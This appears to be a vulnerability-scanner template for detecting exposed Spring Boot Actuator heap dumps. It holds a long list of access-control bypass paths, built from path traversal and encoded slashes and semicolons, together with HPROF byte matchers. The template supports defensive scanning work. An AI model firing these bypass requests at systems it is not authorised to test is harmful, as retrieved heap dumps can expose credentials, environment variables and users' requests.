id: springboot-heapdump-v2_tomcat_slice

info:
  name: Spring Boot Actuator - Heap Dump Detection
  author: that_juan_,dwisiswant0,wdahlenb,dk4trin
  severity: critical
  description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests.
  reference:
    - https://github.com/pyn3rd/Spring-Boot-Vulnerability
  tags: springboot,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%5C../heapdump"
      - "{{BaseURL}}/%5C../actuator/heapdump"
      - "{{BaseURL}}/actuator/%2e%2e/heapdump"
      - "{{BaseURL}}/actuator%252Fheapdump"
      - "{{BaseURL}}/actuator%2fheapdump"
      - "{{BaseURL}}/actuator//heapdump"
      - "{{BaseURL}}/actuator%5Cheapdump"
      - "{{BaseURL}}/actuator/%252e%252e%252f/heapdump"      
      - "{{BaseURL}}/A/B/C/.;./.;./.;/actuator/"
      - "{{BaseURL}}/;actuator/;heapdump"
      - "{{BaseURL}}/%5C../api/v5/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v4/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v3/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v2/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v1/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/actuator/heapdump"
      - "{{BaseURL}}/..;/heapdump"
      - "{{BaseURL}}/..;/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v5/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v4/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v3/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v2/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v1/actuator/heapdump"
      - "{{BaseURL}}/%2e%2e%2f/actuator/heapdump"
      - "{{BaseURL}}/%252e%252e%252f/actuator/heapdump"
      - "{{BaseURL}}/%2factuator/heapdump"
      - "{{BaseURL}}/%252factuator/heapdump"
      - "{{BaseURL}}/actuator/env"
      - "{{BaseURL}}//heapdump"
      - "{{BaseURL}}/admin/heapdump"
      - "{{BaseURL}}/..;/admin/heapdump"
      - "{{BaseURL}}/..;/admin/actuator/heapdump"
      - "{{BaseURL}}//actuator/heapdump"
      - "{{BaseURL}}/%2f/heapdump"
      - "{{BaseURL}}/%2f/actuator/heapdump"
      - "{{BaseURL}}/%2e/heapdump"
      - "{{BaseURL}}/%2e/actuator/heapdump"
      - "{{BaseURL}}/%2e%2e/heapdump"
      - "{{BaseURL}}/%2e%2e/actuator/heapdump"
      - "{{BaseURL}}/..;/%2e/heapdump"
      - "{{BaseURL}}/..;/%2e/actuator/heapdump"
      - "{{BaseURL}}/dump"
      - "{{BaseURL}}/actuator/dump"
      - "{{BaseURL}}/admin/dump"
      - "{{BaseURL}}/..;/admin/dump"
      - "{{BaseURL}}/..;/admin/actuator/dump"
      - "{{BaseURL}}//actuator/dump"
      - "{{BaseURL}}/%2f/dump"
      - "{{BaseURL}}/%2f/actuator/dump"
      - "{{BaseURL}}/%2e/dump"
      - "{{BaseURL}}/%2e/actuator/dump"
      - "{{BaseURL}}/%2e%2e/dump"
      - "{{BaseURL}}/%2e%2e/actuator/dump"
      - "{{BaseURL}}/..;/%2e/dump"
      - "{{BaseURL}}/..;/%2e/actuator/dump"
      - "{{BaseURL}}/datahub/admin/dump"
      - "{{BaseURL}}/..;/datahub/admin/dump"
      - "{{BaseURL}}/..;/datahub/admin/actuator/dump"
      - "{{BaseURL}}/datahub/actuator/dump"
      - "{{BaseURL}}/%2f/datahub/dump"
      - "{{BaseURL}}/%2f/datahub/actuator/dump"
      - "{{BaseURL}}/%2e/datahub/dump"
      - "{{BaseURL}}/%2e/datahub/actuator/dump"
      - "{{BaseURL}}/%2e%2e/datahub/dump"
      - "{{BaseURL}}/%2e%2e/datahub/actuator/dump"
      - "{{BaseURL}}/..;/%2e/datahub/dump"
      - "{{BaseURL}}/..;/%2e/datahub/actuator/dump"
      - "{{BaseURL}}/api/heapdump"
      - "{{BaseURL}}/actuator/api/heapdump"
      - "{{BaseURL}}/cabinet/stripeapi/actuator/heapdump"
      - "{{BaseURL}}/%2e/viewer/actuator/heapdump"
      - "{{BaseURL}}/%2f/actuator/jvm/heapdump"
      - "{{BaseURL}}/%2f/admin/heapdump"
      - "{{BaseURL}}/%2f/admin/memory/generateHeapDump"
      - "{{BaseURL}}/%2f/api/actuator/heapdump"
      - "{{BaseURL}}/%2f/api/v1/actuator/heapdump"
      - "{{BaseURL}}/%2f/api/v2/actuator/heapdump"
      - "{{BaseURL}}/%2f/api/v3/actuator/heapdump"
      - "{{BaseURL}}/%2f/api/v4/actuator/heapdump"
      - "{{BaseURL}}/%2f/api/v5/actuator/heapdump"
      - "{{BaseURL}}/%2f/datahub/actuator/dump"
      - "{{BaseURL}}/%2f/datahub/dump"
      - "{{BaseURL}}/../actuator/dump"
      - "{{BaseURL}}/../actuator/heapdump"
      - "{{BaseURL}}/..;/%2e/datahub/actuator/dump"
      - "{{BaseURL}}/..;/%2e/datahub/dump"
      - "{{BaseURL}}/..;/%2e/dump"
      - "{{BaseURL}}/..;/%2e/heapdump"
      - "{{BaseURL}}/..;/actuator/jvm/heapdump"
      - "{{BaseURL}}/..;/admin/memory/generateHeapDump"
      - "{{BaseURL}}/..;/api/actuator/heapdump"
      - "{{BaseURL}}/..;/api/heapdump"
      - "{{BaseURL}}/..;/api/v1/heapdump"
      - "{{BaseURL}}/..;/datahub/admin/actuator/dump"
      - "{{BaseURL}}/..;/datahub/admin/dump"
      - "{{BaseURL}}/..;/viewer/actuator/heapdump"
      - "{{BaseURL}}/;/actuator/heapdump"
      - "{{BaseURL}}/;/actuator/jvm/heapdump"
      - "{{BaseURL}}/;/admin/heapdump"
      - "{{BaseURL}}/;/admin/memory/generateHeapDump"
      - "{{BaseURL}}/;/api/actuator/heapdump"
      - "{{BaseURL}}/;/api/heapdump"
      - "{{BaseURL}}/;/api/v1/actuator/heapdump"
      - "{{BaseURL}}/;/api/v1/heapdump"
      - "{{BaseURL}}/;/api/v2/actuator/heapdump"
      - "{{BaseURL}}/;/api/v3/actuator/heapdump"
      - "{{BaseURL}}/;/api/v4/actuator/heapdump"
      - "{{BaseURL}}/;/api/v5/actuator/heapdump"
      - "{{BaseURL}}/;/heapdump"
      - "{{BaseURL}}/;/viewer/actuator/heapdump"
      - "{{BaseURL}}%FF%2E%FF%2E/actuator/heapdump"
      - "{{BaseURL}}%61%63%74%75%61%74%6f%72/actuator/heapdump"
    stop-at-first-match: true
    max-size: 2097152 # 2MB - Max Size to read from server response
    matchers-condition: or
    matchers:
      - type: binary
        part: body
        binary:
          - "4a4156412050524f46494c45" # "JAVA PROFILE"
          - "4850524f46" # "HPROF"
          - "1f8b080000000000" # Gunzip magic byte
        
      - type: word
        words:
          - "JAVA PROFILE"
          - "HPROF"